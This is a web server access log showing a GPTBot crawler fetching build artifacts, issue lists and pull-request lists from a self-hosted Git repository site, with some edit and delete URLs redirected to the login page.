"/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:19:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:19:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:19:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:19:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:19:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:19:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11177] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:19:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71137] [Gzip 17.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:19:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72324] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:19:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71088] [Gzip 17.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:19:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72159] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:19:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11177] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:19:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:19:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37285] [Gzip 14.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:19:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72281] [Gzip 17.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:19:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38854] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:19:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:19:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:19:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:38:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:38:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 962] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:38:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:19:38:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 